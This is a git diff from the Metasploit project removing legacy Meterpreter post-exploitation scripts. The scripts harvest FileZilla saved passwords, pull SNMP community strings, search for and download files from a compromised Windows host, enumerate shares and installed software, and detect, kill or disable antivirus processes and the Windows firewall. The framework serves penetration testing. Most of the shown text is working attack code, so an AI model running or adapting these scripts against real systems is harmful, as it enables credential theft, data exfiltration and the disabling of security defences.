-      print_status()
74
-    end
75
-  end
76
-end
77
-
78
-if client.platform =~ /win32|64/
79
-  # Variables to hold info
80
-  mount_history = []
81
-  run_history = []
82
-
83
-  # Enumerate shares being offered
84
-  enum_conf_shares()
85
-
86
-  if not is_system?
87
-    mount_history = enum_recent_mounts("HKEY_CURRENT_USER")
88
-    run_history = enum_run_unc("HKEY_CURRENT_USER")
89
-  else
90
-    user_sid = []
91
-    key = "HKU\\"
92
-    root_key, base_key = client.sys.registry.splitkey(key)
93
-    open_key = client.sys.registry.open_key(root_key, base_key)
94
-    keys = open_key.enum_key
95
-    keys.each do |k|
96
-      user_sid << k if k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/
97
-    end
98
-    user_sid.each do |us|
99
-      mount_history = mount_history + enum_recent_mounts("HKU\\#{us.chomp}")
100
-      run_history = run_history + enum_run_unc("HKU\\#{us.chomp}")
101
-    end
102
-  end
103
-
104
-  # Enumerate Mount History
105
-  if mount_history.length > 0
106
-    print_status("Recent Mounts found:")
107
-    mount_history.each do |i|
108
-      print_status("\t#{i}")
109
-    end
110
-    print_status()
111
-  end
112
-
113
-  #Enumerate UNC Paths entered in the Dialog box
114
-  if run_history.length > 0
115
-    print_status("Recent UNC paths entered in Run Dialog found:")
116
-    run_history.each do |i|
117
-      print_status("\t#{i}")
118
-    end
119
-    print_status()
120
-  end
121
-else
122
-  print_error("This version of Meterpreter is not supported with this Script!")
123
-  raise Rex::Script::Completed
124
-end

+ 0
- 87
scripts/meterpreter/file_collector.rb View File

@@ -1,87 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
9
-#-------------------------------------------------------------------------------
10
-@client = client
11
-location = nil
12
-search_blob = []
13
-input_file = nil
14
-output_file = nil
15
-recurse = false
16
-logs = nil
17
-@opts = Rex::Parser::Arguments.new(
18
-  "-h" => [false, "Help menu." ],
19
-  "-i" => [true, "Input file with list of files to download, one per line."],
20
-  "-d" => [true, "Directory to start search on, search will be recursive."],
21
-  "-f" => [true, "Search blobs separated by a |."],
22
-  "-o" => [true, "Output File to save the full path of files found."],
23
-  "-r" => [false, "Search subdirectories."],
24
-  "-l" => [true, "Location where to save the files."]
25
-)
26
-# Function for displaying help message
27
-def usage
28
-  print_line "Meterpreter Script for searching and downloading files that"
29
-  print_line "match a specific pattern. First save files to a file, edit and"
30
-  print_line("use that same file to download the choosen files.")
31
-  print_line(@opts.usage)
32
-  raise Rex::Script::Completed
33
-end
34
-
35
-# Check that we are running under the right type of Meterpreter
36
-if client.platform =~ /win32|win64/
37
-  # Parse the options
38
-  if args.length > 0
39
-    @opts.parse(args) { |opt, idx, val|
40
-      case opt
41
-      when "-h"
42
-        usage
43
-      when "-i"
44
-        input_file = val
45
-      when "-o"
46
-        output_file = val
47
-      when "-d"
48
-        location = val
49
-      when "-f"
50
-        search_blob = val.split("|")
51
-      when "-r"
52
-        recurse = true
53
-      when "-l"
54
-        logs = val
55
-      end
56
-    }
57
-    # Search for files and save their location if specified
58
-    if search_blob.length > 0 and location
59
-      search_blob.each do |s|
60
-        print_status("Searching for #{s}")
61
-        results = @client.fs.file.search(location,s,recurse)
62
-        results.each do |file|
63
-          print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
64
-          file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
65
-        end
66
-      end
67
-    end
68
-    # Read log file and download those files found
69
-    if input_file and logs
70
-      if ::File.exist?(input_file)
71
-        print_status("Reading file #{input_file}")
72
-        print_status("Downloading to #{logs}")
73
-        ::File.open(input_file, "r").each_line do |line|
74
-          print_status("\tDownloading #{line.chomp}")
75
-          @client.fs.file.download(logs, line.chomp)
76
-        end
77
-      else
78
-        print_error("File #{input_file} does not exist!")
79
-      end
80
-    end
81
-  else
82
-    usage
83
-  end
84
-else
85
-  print_error("This version of Meterpreter is not supported with this Script!")
86
-  raise Rex::Script::Completed
87
-end

+ 0
- 70
scripts/meterpreter/get_application_list.rb View File

@@ -1,70 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-# Meterpreter script for listing installed applications and their version.
9
-# Provided: carlos_perez[at]darkoperator[dot]com
10
-
11
-#Options and Option Parsing
12
-opts = Rex::Parser::Arguments.new(
13
-  "-h" => [ false, "Help menu." ]
14
-)
15
-
16
-def app_list
17
-  tbl = Rex::Text::Table.new(
18
-    'Header'  => "Installed Applications",
19
-    'Indent'  => 1,
20
-    'Columns' => [
21
-      "Name",
22
-      "Version"
23
-    ])
24
-  appkeys = ['HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
25
-    'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' ]
26
-  threadnum = 0
27
-  a = []
28
-  appkeys.each do |keyx86|
29
-    soft_keys = registry_enumkeys(keyx86)
30
-    if soft_keys
31
-      soft_keys.each do |k|
32
-        if threadnum < 10
33
-          a.push(::Thread.new {
34
-              begin
35
-                dispnm = registry_getvaldata("#{keyx86}\\#{k}","DisplayName")
36
-                dispversion = registry_getvaldata("#{keyx86}\\#{k}","DisplayVersion")
37
-                if dispnm =~ /\S*/
38
-                  tbl << [dispnm,dispversion]
39
-                end
40
-              rescue
41
-              end
42
-            })
43
-          threadnum += 1
44
-        else
45
-          sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
46
-          threadnum = 0
47
-        end
48
-      end
49
-    end
50
-
51
-
52
-  end
53
-  print_line("\n" + tbl.to_s + "\n")
54
-end
55
-
56
-opts.parse(args) { |opt, idx, val|
57
-  case opt
58
-  when "-h"
59
-    print_line "Meterpreter Script for extracting a list installed applications and their version."
60
-    print_line(opts.usage)
61
-    raise Rex::Script::Completed
62
-
63
-  end
64
-}
65
-if client.platform =~ /win32|win64/
66
-  app_list
67
-else
68
-  print_error("This version of Meterpreter is not supported with this Script!")
69
-  raise Rex::Script::Completed
70
-end

+ 0
- 177
scripts/meterpreter/get_filezilla_creds.rb View File

@@ -1,177 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-require "rexml/document"
9
-
10
-#-------------------------------------------------------------------------------
11
-#Options and Option Parsing
12
-opts = Rex::Parser::Arguments.new(
13
-  "-h" => [ false, "Help menu." ],
14
-  "-c" => [ false, "Return credentials." ]
15
-)
16
-
17
-get_credentials=false
18
-
19
-opts.parse(args) { |opt, idx, val|
20
-  case opt
21
-  when "-h"
22
-    print_line "Meterpreter Script for extracting servers and credentials from Filezilla."
23
-    print_line(opts.usage)
24
-    raise Rex::Script::Completed
25
-  when "-c"
26
-    get_credentials=true
27
-  end
28
-}
29
-### If we get here and have none of our flags true, then we'll just
30
-###   get credentials
31
-if !(get_credentials)
32
-  get_credentials=true
33
-end
34
-
35
-#-------------------------------------------------------------------------------
36
-#Set General Variables used in the script
37
-@client = client
38
-os = @client.sys.config.sysinfo['OS']
39
-host = @client.sys.config.sysinfo['Computer']
40
-# Create Filename info to be appended to downloaded files
41
-filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
42
-# Create a directory for the logs
43
-logs = ::File.join(Msf::Config.log_directory, 'filezilla', Rex::FileUtils.clean_path(host + filenameinfo) )
44
-# Create the log directory
45
-::FileUtils.mkdir_p(logs)
46
-#logfile name
47
-dest = Rex::FileUtils.clean_path(logs + "/" + host + filenameinfo + ".txt")
48
-
49
-#-------------------------------------------------------------------------------
50
-#function for checking of FileZilla profile is present
51
-def check_filezilla(path)
52
-  found = nil
53
-  @client.fs.dir.foreach(path) do |x|
54
-    next if x =~ /^(\.|\.\.)$/
55
-    if x =~ (/FileZilla/)
56
-      ### If we find the path, let's return it
57
-      found = path + x
58
-      return found
59
-    end
60
-  end
61
-  return found
62
-end
63
-
64
-#-------------------------------------------------------------------------------
65
-
66
-def extract_saved_creds(path,xml_file)
67
-  accounts_xml = ""
68
-  creds = ""
69
-  print_status("Reading #{xml_file} file...")
70
-  ### modified to use pidgin_path, which already has .purple in it
71
-  account_file = @client.fs.file.new(path + "\\#{xml_file}", "rb")
72
-  until account_file.eof?
73
-    accounts_xml << account_file.read
74
-  end
75
-  account_file.close
76
-  doc = (REXML::Document.new accounts_xml).root
77
-  doc.elements.to_a("//Server").each do |e|
78
-    print_status "\tHost: #{e.elements["Host"].text}"
79
-    creds << "Host: #{e.elements["Host"].text}"
80
-    print_status "\tPort: #{e.elements["Port"].text}"
81
-    creds << "Port: #{e.elements["Port"].text}"
82
-    logon_type = e.elements["Logontype"].text
83
-    if logon_type == "0"
84
-      print_status "\tLogon Type: Anonymous"
85
-      creds << "Logon Type: Anonymous"
86
-    elsif logon_type =~ /1|4/
87
-      print_status "\tUser: #{e.elements["User"].text}"
88
-      creds << "User: #{e.elements["User"].text}"
89
-      print_status "\tPassword: #{e.elements["Pass"].text}"
90
-      creds << "Password: #{e.elements["Pass"].text}"
91
-    elsif logon_type =~ /2|3/
92
-      print_status "\tUser: #{e.elements["User"].text}"
93
-      creds << "User: #{e.elements["User"].text}"
94
-    end
95
-
96
-    proto = e.elements["Protocol"].text
97
-    if  proto == "0"
98
-      print_status "\tProtocol: FTP"
99
-      creds << "Protocol: FTP"
100
-    elsif proto == "1"
101
-      print_status "\tProtocol: SSH"
102
-      creds << "Protocol: SSH"
103
-    elsif proto == "3"
104
-      print_status "\tProtocol: FTPS"
105
-      creds << "Protocol: FTPS"
106
-    elsif proto == "4"
107
-      print_status "\tProtocol: FTPES"
108
-      creds << "Protocol: FTPES"
109
-    end
110
-    print_status ""
111
-    creds << ""
112
-
113
-  end
114
-#
115
-  return creds
116
-end
117
-#-------------------------------------------------------------------------------
118
-#Function to enumerate the users if running as SYSTEM
119
-def enum_users(os)
120
-  users = []
121
-
122
-  path4users = ""
123
-  sysdrv = @client.sys.config.getenv('SystemDrive')
124
-
125
-  if os =~ /7|Vista|2008/
126
-    path4users = sysdrv + "\\users\\"
127
-    path2purple = "\\AppData\\Roaming\\"
128
-  else
129
-    path4users = sysdrv + "\\Documents and Settings\\"
130
-    path2purple = "\\Application Data\\"
131
-  end
132
-
133
-  if is_system?
134
-    print_status("Running as SYSTEM extracting user list..")
135
-    @client.fs.dir.foreach(path4users) do |u|
136
-      userinfo = {}
137
-      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
138
-      userinfo['username'] = u
139
-      userinfo['userappdata'] = path4users + u + path2purple
140
-      users << userinfo
141
-    end
142
-  else
143
-    userinfo = {}
144
-    uservar = @client.sys.config.getenv('USERNAME')
145
-    userinfo['username'] = uservar
146
-    userinfo['userappdata'] = path4users + uservar + path2purple
147
-    users << userinfo
148
-  end
149
-  return users
150
-end
151
-
152
-################## MAIN ##################
153
-if client.platform =~ /win32|win64/
154
-  print_status("Running Meterpreter FileZilla Credential harvester script")
155
-  print_status("All services are logged at #{dest}")
156
-  enum_users(os).each do |u|
157
-    print_status("Checking if Filezilla profile is present for user :::#{u['username']}:::...")
158
-    ### Find the path (if it exists) for this user,
159
-    filezilla_path = check_filezilla(u['userappdata'])
160
-    if filezilla_path
161
-      print_status("FileZilla profile found!")
162
-      ### modified to use filezilla_path
163
-      xml_cfg_files = ['sitemanager.xml','recentservers.xml']
164
-      if get_credentials
165
-        xml_cfg_files.each do |xml_cfg_file|
166
-          file_local_write(dest,extract_saved_creds(filezilla_path,xml_cfg_file))
167
-        end
168
-      end
169
-
170
-    else
171
-      print_error("Filezilla profile not found!")
172
-    end
173
-  end
174
-else
175
-  print_error("This version of Meterpreter is not supported with this Script!")
176
-  raise Rex::Script::Completed
177
-end

+ 0
- 35
scripts/meterpreter/get_local_subnets.rb View File

@@ -1,35 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-# Meterpreter script that display local subnets
9
-# Provided by Nicob <nicob [at] nicob.net>
10
-# Ripped from http://blog.metasploit.com/2006/10/meterpreter-scripts-and-msrt.html
11
-
12
-@@exec_opts = Rex::Parser::Arguments.new(
13
-  "-h" => [ false, "Help menu." ]
14
-)
15
-def usage
16
-  print_line("Get a list of local subnets based on the host's routes")
17
-  print_line("USAGE: run get_local_subnets")
18
-  print_line(@@exec_opts.usage)
19
-  raise Rex::Script::Completed
20
-end
21
-
22
-@@exec_opts.parse(args) { |opt, idx, val|
23
-  case opt
24
-  when "-h"
25
-    usage
26
-  end
27
-}
28
-
29
-client.net.config.each_route { |route|
30
-  # Remove multicast and loopback interfaces
31
-  next if route.subnet =~ /^(224\.|127\.)/
32
-  next if route.subnet == '0.0.0.0'
33
-  next if route.netmask == '255.255.255.255'
34
-  print_line("Local subnet: #{route.subnet}/#{route.netmask}")
35
-}

+ 0
- 64
scripts/meterpreter/get_valid_community.rb View File

@@ -1,64 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#copied getvncpw - thanks grutz/carlos
9
-
10
-session = client
11
-
12
-@@exec_opts = Rex::Parser::Arguments.new(
13
-  "-h" => [ false, "Help menu."]
14
-)
15
-
16
-def usage()
17
-  print("\nPull the SNMP community string from a Windows Meterpreter session\n\n")
18
-  completed
19
-end
20
-
21
-def get_community(session)
22
-  key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities"
23
-  root_key, base_key = session.sys.registry.splitkey(key)
24
-  open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
25
-  begin
26
-    # oddly enough this does not return the data field which indicates ro/rw
27
-    return open_key.enum_value.collect {|x| x.name}
28
-  rescue
29
-    # no registry key found or other error
30
-    return nil
31
-  end
32
-end
33
-
34
-@@exec_opts.parse(args) { |opt, idx, val|
35
-  case opt
36
-  when "-h"
37
-    usage
38
-  end
39
-}
40
-
41
-if client.platform =~ /win32|win64/
42
-  print_status("Searching for community strings...")
43
-  strs = get_community(session)
44
-  if strs
45
-    strs.each do |str|
46
-      print_good("FOUND: #{str}")
47
-      @client.framework.db.report_auth_info(
48
-        :host	=> client.sock.peerhost,
49
-        :port	=> 161,
50
-        :proto	=> 'udp',
51
-        :sname	=> 'snmp',
52
-        :user	=> '',
53
-        :pass	=> str,
54
-        :type	=> "snmp.community",
55
-        :duplicate_ok	=> true
56
-      )
57
-    end
58
-  else
59
-    print_status("Not found")
60
-  end
61
-else
62
-  print_error("This version of Meterpreter is not supported with this Script!")
63
-  raise Rex::Script::Completed
64
-end

+ 0
- 381
scripts/meterpreter/getcountermeasure.rb View File

@@ -1,381 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#
9
-# Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
10
-# Provides also the option to kill the processes of detected products and disable the built-in firewall.
11
-# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
12
-# Version: 0.1.0
13
-session = client
14
-@@exec_opts = Rex::Parser::Arguments.new(
15
-  "-h" => [ false, "Help menu." ],
16
-  "-k" => [ false, "Kill any AV, HIPS and Third Party Firewall process found." ],
17
-  "-d" => [ false, "Disable built in Firewall" ]
18
-)
19
-
20
-def usage
21
-  print_line("Getcountermeasure -- List (or optionally, kill) HIPS and AV")
22
-  print_line("processes, show XP firewall rules, and display DEP and UAC")
23
-  print_line("policies")
24
-  print(@@exec_opts.usage)
25
-  raise Rex::Script::Completed
26
-end
27
-
28
-#-------------------------------------------------------------------------------
29
-avs = %W{
30
-  a2adguard.exe
31
-  a2adwizard.exe
32
-  a2antidialer.exe
33
-  a2cfg.exe
34
-  a2cmd.exe
35
-  a2free.exe
36
-  a2guard.exe
37
-  a2hijackfree.exe
38
-  a2scan.exe
39
-  a2service.exe
40
-  a2start.exe
41
-  a2sys.exe
42
-  a2upd.exe
43
-  aavgapi.exe
44
-  aawservice.exe
45
-  aawtray.exe
46
-  ad-aware.exe
47
-  ad-watch.exe
48
-  alescan.exe
49
-  anvir.exe
50
-  ashdisp.exe
51
-  ashmaisv.exe
52
-  ashserv.exe
53
-  ashwebsv.exe
54
-  aswupdsv.exe
55
-  atrack.exe
56
-  avgagent.exe
57
-  avgamsvr.exe
58
-  avgcc.exe
59
-  avgctrl.exe
60
-  avgemc.exe
61
-  avgnt.exe
62
-  avgtcpsv.exe
63
-  avguard.exe
64
-  avgupsvc.exe
65
-  avgw.exe
66
-  avkbar.exe
67
-  avk.exe
68
-  avkpop.exe
69
-  avkproxy.exe
70
-  avkservice.exe
71
-  avktray
72
-  avktray.exe
73
-  avkwctl
74
-  avkwctl.exe
75
-  avmailc.exe
76
-  avp.exe
77
-  avpm.exe
78
-  avpmwrap.exe
79
-  avsched32.exe
80
-  avwebgrd.exe
81
-  avwin.exe
82
-  avwupsrv.exe
83
-  avz.exe
84
-  bdagent.exe
85
-  bdmcon.exe
86
-  bdnagent.exe
87
-  bdss.exe
88
-  bdswitch.exe
89
-  blackd.exe
90
-  blackice.exe
91
-  blink.exe
92
-  boc412.exe
93
-  boc425.exe
94
-  bocore.exe
95
-  bootwarn.exe
96
-  cavrid.exe
97
-  cavtray.exe
98
-  ccapp.exe
99
-  ccevtmgr.exe
100
-  ccimscan.exe
101
-  ccproxy.exe
102
-  ccpwdsvc.exe
103
-  ccpxysvc.exe
104
-  ccsetmgr.exe
105
-  cfgwiz.exe
106
-  cfp.exe
107
-  clamd.exe
108
-  clamservice.exe
109
-  clamtray.exe
110
-  cmdagent.exe
111
-  cpd.exe
112
-  cpf.exe
113
-  csinsmnt.exe
114
-  dcsuserprot.exe
115
-  defensewall.exe
116
-  defensewall_serv.exe
117
-  defwatch.exe
118
-  f-agnt95.exe
119
-  fpavupdm.exe
120
-  f-prot95.exe
121
-  f-prot.exe
122
-  fprot.exe
123
-  fsaua.exe
124
-  fsav32.exe
125
-  f-sched.exe
126
-  fsdfwd.exe
127
-  fsm32.exe
128
-  fsma32.exe
129
-  fssm32.exe
130
-  f-stopw.exe
131
-  f-stopw.exe
132
-  fwservice.exe
133
-  fwsrv.exe
134
-  iamstats.exe
135
-  iao.exe
136
-  icload95.exe
137
-  icmon.exe
138
-  idsinst.exe
139
-  idslu.exe
140
-  inetupd.exe
141
-  irsetup.exe
142
-  isafe.exe
143
-  isignup.exe
144
-  issvc.exe
145
-  kav.exe
146
-  kavss.exe
147
-  kavsvc.exe
148
-  klswd.exe
149
-  kpf4gui.exe
150
-  kpf4ss.exe
151
-  livesrv.exe
152
-  lpfw.exe
153
-  mcagent.exe
154
-  mcdetect.exe
155
-  mcmnhdlr.exe
156
-  mcrdsvc.exe
157
-  mcshield.exe
158
-  mctskshd.exe
159
-  mcvsshld.exe
160
-  mghtml.exe
161
-  mpftray.exe
162
-  msascui.exe
163
-  mscifapp.exe
164
-  msfwsvc.exe
165
-  msgsys.exe
166
-  msssrv.exe
167
-  navapsvc.exe
168
-  navapw32.exe
169
-  navlogon.dll
170
-  navstub.exe
171
-  navw32.exe
172
-  nisemsvr.exe
173
-  nisum.exe
174
-  nmain.exe
175
-  noads.exe
176
-  nod32krn.exe
177
-  nod32kui.exe
178
-  nod32ra.exe
179
-  npfmntor.exe
180
-  nprotect.exe
181
-  nsmdtr.exe
182
-  oasclnt.exe
183
-  ofcdog.exe
184
-  opscan.exe
185
-  ossec-agent.exe
186
-  outpost.exe
187
-  paamsrv.exe
188
-  pavfnsvr.exe
189
-  pcclient.exe
190
-  pccpfw.exe
191
-  pccwin98.exe
192
-  persfw.exe
193
-  protector.exe
194
-  qconsole.exe
195
-  qdcsfs.exe
196
-  rtvscan.exe
197
-  sadblock.exe
198
-  safe.exe
199
-  sandboxieserver.exe
200
-  savscan.exe
201
-  sbiectrl.exe
202
-  sbiesvc.exe
203
-  sbserv.exe
204
-  scfservice.exe
205
-  sched.exe
206
-  schedm.exe
207
-  scheduler daemon.exe
208
-  sdhelp.exe
209
-  serv95.exe
210
-  sgbhp.exe
211
-  sgmain.exe
212
-  slee503.exe
213
-  smartfix.exe
214
-  smc.exe
215
-  snoopfreesvc.exe
216
-  snoopfreeui.exe
217
-  spbbcsvc.exe
218
-  sp_rsser.exe
219
-  spyblocker.exe
220
-  spybotsd.exe
221
-  spysweeper.exe
222
-  spysweeperui.exe
223
-  spywareguard.dll
224
-  spywareterminatorshield.exe
225
-  ssu.exe
226
-  steganos5.exe
227
-  stinger.exe
228
-  swdoctor.exe
229
-  swupdate.exe
230
-  symlcsvc.exe
231
-  symundo.exe
232
-  symwsc.exe
233
-  symwscno.exe
234
-  tcguard.exe
235
-  tds2-98.exe
236
-  tds-3.exe
237
-  teatimer.exe
238
-  tgbbob.exe
239
-  tgbstarter.exe
240
-  tsatudt.exe
241
-  umxagent.exe
242
-  umxcfg.exe
243
-  umxfwhlp.exe
244
-  umxlu.exe
245
-  umxpol.exe
246
-  umxtray.exe
247
-  usrprmpt.exe
248
-  vetmsg9x.exe
249
-  vetmsg.exe
250
-  vptray.exe
251
-  vsaccess.exe
252
-  vsserv.exe
253
-  wcantispy.exe
254
-  win-bugsfix.exe
255
-  winpatrol.exe
256
-  winpatrolex.exe
257
-  wrsssdk.exe
258
-  xcommsvr.exe
259
-  xfr.exe
260
-  xp-antispy.exe
261
-  zegarynka.exe
262
-  zlclient.exe
263
-}
264
-#-------------------------------------------------------------------------------
265
-# Check for the presence of AV, HIPS and Third Party firewall and/or kill the
266
-# processes associated with it
267
-def check(session,avs,killbit)
268
-  print_status("Checking for contermeasures...")
269
-  session.sys.process.get_processes().each do |x|
270
-    if (avs.index(x['name'].downcase))
271
-      print_status("\tPossible countermeasure found #{x['name']} #{x['path']}")
272
-      if (killbit)
273
-        print_status("\tKilling process for countermeasure.....")
274
-        session.sys.process.kill(x['pid'])
275
-      end
276
-    end
277
-  end
278
-end
279
-#-------------------------------------------------------------------------------
280
-# Get the configuration and/or disable the built in Windows Firewall
281
-def checklocalfw(session,killfw)
282
-  print_status("Getting Windows Built in Firewall configuration...")
283
-  opmode = ""
284
-  r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true})
285
-  while(d = r.channel.read)
286
-    opmode << d
287
-  end
288
-  r.channel.close
289
-  r.close
290
-  opmode.split("\n").each do |o|
291
-    print_status("\t#{o}")
292
-  end
293
-  if (killfw)
294
-    print_status("Disabling Built in Firewall.....")
295
-    f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
296
-    while(d = f.channel.read)
297
-      if d =~ /The requested operation requires elevation./
298
-        print_status("\tUAC or Insufficient permissions prevented the disabling of Firewall")
299
-      end
300
-    end
301
-    f.channel.close
302
-    f.close
303
-  end
304
-end
305
-#-------------------------------------------------------------------------------
306
-# Function for getting the current DEP Policy on the Windows Target
307
-def checkdep(session)
308
-  tmpout = ""
309
-  depmode = ""
310
-  # Expand environment %TEMP% variable
311
-  tmp = session.sys.config.getenv('TEMP')
312
-  # Create random name for the wmic output
313
-  wmicfile = sprintf("%.5d",rand(100000))
314
-  wmicout = "#{tmp}\\#{wmicfile}"
315
-  print_status("Checking DEP Support Policy...")
316
-  r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true})
317
-  sleep(2)
318
-  r.close
319
-  r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true})
320
-    while(d = r.channel.read)
321
-      tmpout << d
322
-    end
323
-  r.channel.close
324
-  r.close
325
-  session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true})
326
-  depmode = tmpout.scan(/(\d)/)
327
-  if depmode.to_s == "0"
328
-    print_status("\tDEP is off for the whole system.")
329
-  elsif depmode.to_s == "1"
330
-    print_status("\tFull DEP coverage for the whole system with no exceptions.")
331
-  elsif depmode.to_s == "2"
332
-    print_status("\tDEP is limited to Windows system binaries.")
333
-  elsif depmode.to_s == "3"
334
-    print_status("\tDEP is on for all programs and services.")
335
-  end
336
-
337
-end
338
-#-------------------------------------------------------------------------------
339
-def checkuac(session)
340
-  print_status("Checking if UAC is enabled ...")
341
-  key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
342
-  root_key, base_key = session.sys.registry.splitkey(key)
343
-  value = "EnableLUA"
344
-  open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
345
-  v = open_key.query_value(value)
346
-  if v.data == 1
347
-    print_status("\tUAC is Enabled")
348
-  else
349
-    print_status("\tUAC is Disabled")
350
-  end
351
-end
352